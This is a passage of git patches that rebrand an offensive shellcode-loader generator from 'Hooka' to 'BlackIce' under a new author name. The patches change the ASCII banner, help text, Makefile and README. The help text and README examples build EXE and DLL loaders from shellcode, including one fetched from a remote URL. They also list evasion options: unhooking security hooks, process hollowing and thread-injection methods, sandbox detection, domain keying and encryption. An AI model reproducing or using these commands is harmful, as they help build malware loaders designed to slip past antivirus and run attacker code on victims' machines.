- fmt.Println(" _ _ _ _")
- fmt.Println(" | | | | ___ ___ | | __ __ _ | |")
- fmt.Println(" | |_| | / _ \\ / _ \\ | |/ / / _` | | |")
- fmt.Println(" | _ | | (_) | | (_) | | < | (_| | |_|")
- fmt.Println(" |_| |_| \\___/ \\___/ |_|\\_\\ \\__,_| (_)")
+func banner() {
+ fmt.Println("\033[36m") // Cyan color for ice effect
+ fmt.Println("╔═══════════════════════════════════════════════════════════════════╗")
+ fmt.Println("║ ║")
+ fmt.Println("║ ▄▄▄▄ ██▓ ▄▄▄ ▄████▄ ██ ▄█▀ ██▓ ▄████▄ ▓█████ ║")
+ fmt.Println("║ ▓█████▄ ▓██▒ ▒████▄ ▒██▀ ▀█ ██▄█▒ ▓██▒▒██▀ ▀█ ▓█ ▀ ║")
+ fmt.Println("║ ▒██▒ ▄██▒██░ ▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒██▒▒▓█ ▄ ▒███ ║")
+ fmt.Println("║ ▒██░█▀ ▒██░ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ░██░▒▓▓▄ ▄██▒▒▓█ ▄ ║")
+ fmt.Println("║ ░▓█ ▀█▓░██████▒▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░██░▒ ▓███▀ ░░▒████▒ ║")
+ fmt.Println("║ ░▒▓███▀▒░ ▒░▓ ░▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░▓ ░ ░▒ ▒ ░░░ ▒░ ░ ║")
+ fmt.Println("║ ▒░▒ ░ ░ ░ ▒ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ▒ ░ ░ ▒ ░ ░ ░ ║")
+ fmt.Println("║ ░ ░ ░ ░ ░ ▒ ░ ░ ░░ ░ ▒ ░░ ░ ║")
+ fmt.Println("║ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ║")
+ fmt.Println("║ ░ ░ ░ ║")
+ fmt.Println("║ ║")
+ fmt.Println("║ ░▒▓█ B L A C K I C E █▓▒░ ║")
+ fmt.Println("║ By MrDedSec ║")
+ fmt.Println("╚═══════════════════════════════════════════════════════════════════╝")
+ fmt.Println("\033[0m") // Reset color
}
// function to print the help panel
func help_panel(){
fmt.Println(`
-Usage of Hooka:
+Usage of BlackIce:
REQUIRED:
-i, --input string payload to inject in raw format, as PE, as DLL or from a URL
-o, --output string name of output file (i.e. loader.exe)
@@ -102,7 +115,7 @@ Examples:
// as the names may be a little bit confussing
var techniques []string = []string{"ntcreatethreadex", "ntcreatethread", "suspendedprocess", "etwpcreateetwthread", "processhollowing", "no-rwx", "nrwx", "norwx", "ntqueueapcthreadex"}
-var buffer bytes.Buffer
+var buffer bytes.Buffer
func main() {
// define variables that will hold CLI arguments values
From 8b471ab4975f90cb90d8c47c16cac58106157029 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:32:56 +0000
Subject: [PATCH 05/12] hooka -> Blackice
---
Makefile | 2 +-
cmd/main.go | 10 +++++-----
2 files changed, 6 insertions(+), 6 deletions(-)
diff --git a/Makefile b/Makefile
index 38ad2fd..8129aad 100644
--- a/Makefile
+++ b/Makefile
@@ -1,4 +1,4 @@
-EXECUTABLE=hooka
+EXECUTABLE=blackice
WINDOWS=$(EXECUTABLE)_windows_amd64.exe
LINUX=$(EXECUTABLE)_linux_amd64
DARWIN=$(EXECUTABLE)_darwin_amd64
diff --git a/cmd/main.go b/cmd/main.go
index 7042425..2f615ce 100644
--- a/cmd/main.go
+++ b/cmd/main.go
@@ -103,10 +103,10 @@ Usage of BlackIce:
-h, --help print help panel
Examples:
- hooka -i shellcode.bin -o loader.exe
- hooka -i http://192.168.1.126/shellcode.bin -o loader.exe
- hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg
- hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
+ blackice -i shellcode.bin -o loader.exe
+ blackice -i http://192.168.1.126/shellcode.bin -o loader.exe
+ blackice -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg
+ blackice -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
`)
}
@@ -3247,7 +3247,7 @@ func CompileLoader(format string, output_file string, compress bool, arch string
if os.IsNotExist(err) {
// if it doesn't exist, then create it
- mod_cmd := exec.Command("go", "mod", "init", "hooka_ldr")
+ mod_cmd := exec.Command("go", "mod", "init", "blackice_ldr")
err = mod_cmd.Run()
if err != nil {
return err
From e98297693b8fe263b2f1d83462c8bc078839217d Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:35:23 +0000
Subject: [PATCH 06/12] readme commands examples to blackice. git clone link
fixed
---
README.md | 22 +++++++++++-----------
1 file changed, 11 insertions(+), 11 deletions(-)
diff --git a/README.md b/README.md
index 3598b9d..c714dbd 100644
--- a/README.md
+++ b/README.md
@@ -70,7 +70,7 @@ This tool is able to generate loaders with this features:
Just clone the repository like this:
```sh
-git clone https://github.com/Mrdedsecurity/BlackIce-Loader.git
+git clone https://github.com/Mrdedsecurity/BlackIce.git
cd BlackIce-Loader
make
```
@@ -128,28 +128,28 @@ Usage of BlackIce:
-h, --help print help panel
Examples:
- hooka -i shellcode.bin -o loader.exe
- hooka -i http://192.168.1.126/shellcode.bin -o loader.exe
- hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg
- hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
+ blackice -i shellcode.bin -o loader.exe
+ blackice -i http://192.168.1.126/shellcode.bin -o loader.exe
+ blackice -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --unhook full --sleep --acg
+ blackice -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose
```
> Generate a simple EXE loader
```sh
-$ hooka_linux_amd64 -i shellcode.bin -o loader.exe
+$ blackice_linux_amd64 -i shellcode.bin -o loader.exe
```
> Generate a DLL loader
```sh
-$ hooka_linux_amd64 -i shellcode.bin -o loader.dll -f dll
+$ blackice_linux_amd64 -i shellcode.bin -o loader.dll -f dll
```
> Use custom config (various examples)
```sh
-$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --hashing --agc --sleep --verbose
-$ hooka_linux_amd64 -i shellcode.bin -o loader.exe --exec ProcessHollowing --sgn --strings --blockdlls
-$ hooka_linux_amd64 -i http://xx.xx.xx.xx/shellcode.bin --sandbox --sleep --domain www.microsoft.com --verbose
-$ hooka_linux_amd64 --calc -o loader.exe --user "DESKTOP-E1D6G0A\tom" --computername "DESKTOP-E1D6G0A" --compress --strings
+$ blackice_linux_amd64 -i shellcode.bin -o loader.exe --hashing --agc --sleep --verbose
+$ blackice_linux_amd64 -i shellcode.bin -o loader.exe --exec ProcessHollowing --sgn --strings --blockdlls
+$ blackice_linux_amd64 -i http://xx.xx.xx.xx/shellcode.bin --sandbox --sleep --domain www.microsoft.com --verbose
+$ blackice_linux_amd64 --calc -o loader.exe --user "DESKTOP-E1D6G0A\tom" --computername "DESKTOP-E1D6G0A" --compress --strings
```
# Demo
From 3378c415da081d82c772cadd8e5e006e8b504914 Mon Sep 17 00:00:00 2001
From: MrDedSec <91702292+Mrdedsecurity@users.noreply.github.com>
Date: Thu, 11 Dec 2025 19:41:21 +0000
Subject: [PATCH 07/12] readme updated
---
README.md | 19 ++++++++++++++++---
1 file changed, 16 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index c714dbd..32165ba 100644
--- a/README.md
+++ b/README.md
@@ -1,9 +1,22 @@